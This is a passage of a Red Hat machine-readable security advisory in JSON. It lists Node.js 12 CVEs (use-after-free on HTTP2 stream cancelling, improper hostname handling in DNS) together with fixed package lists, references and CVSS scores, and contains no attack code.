"7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "c-ares: Missing input validation of host names may lead to domain hijacking" }, { "cve": "CVE-2021-22930", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-07-30T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1988394" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js, where it is vulnerable to a use-after-free attack. This flaw allows an attacker to exploit the memory corruption, which causes a change in the process behavior. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Use-after-free on close http2 on stream canceling", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\" with impact LOW.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22930" }, { "category": "external", "summary": "RHBZ#1988394", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988394" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22930", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22930" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22930", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22930" } ], "release_date": "2021-07-29T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "nodejs: Use-after-free on close http2 on stream canceling" }, { "cve": "CVE-2021-22931", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-08-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1993019" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js. These vulnerabilities include remote code execution, Cross-site scripting (XSS), application crashes due to missing input validation of hostnames returned by Domain Name Servers in the Node.js DNS library, which can lead to the output of wrong hostnames (leading to Domain hijacking) and injection vulnerabilities in applications using the library.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Improper handling of untypical characters in domain names", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\" with impact LOW.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22931" }, { "category": "external", "summary": "RHBZ#1993019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993019" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22931", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22931" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22931", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22931" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/" } ], "release_date": "2021-08-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", 